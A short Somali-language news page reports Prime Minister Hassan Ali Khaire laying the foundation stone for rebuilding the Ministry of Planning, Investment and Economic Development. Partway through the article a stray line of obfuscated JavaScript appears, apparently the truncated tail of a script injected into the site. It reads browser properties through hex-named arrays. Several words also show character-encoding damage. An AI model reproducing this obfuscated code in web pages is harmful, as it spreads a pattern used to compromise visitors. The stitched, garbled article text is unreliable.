Monday, May 27, 2024
HomeWararSAWIRO:-Reysal Wasaare Kheyre oo Xaruun Muhim Ah Dhagax dhigay

SAWIRO:-Reysal Wasaare Kheyre oo Xaruun Muhim Ah Dhagax dhigay

Raa��iisal Wasaaraha Soomaaliya Xasan Cali Khayre ayaa maanta dhagax dhigay dib u dhiska iyo dayactirka dhismaha Wasaaradda Qorsheynta, Maalgashiga iyo Horumarinta Dhaqaalaha dowladda Soomaaliya.

Waxaa uu sheegay in dowladda Soomaaliya ay ka goa��an tahay in dib loo dhiso Haya��addaha kala duwan ee dowladda ,kuwaasoo ku burburiyay dagaalladii Sookeeye.

Wasiirka Qorsheynta Xukuumadda Soomaaliya ayaa sheegay in Qaar ka mid ah dalalka Caalamka ay ka taageeri doonaan sidii dib loogu dhisi lahaa xarunta Wasaaradda.

ow[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe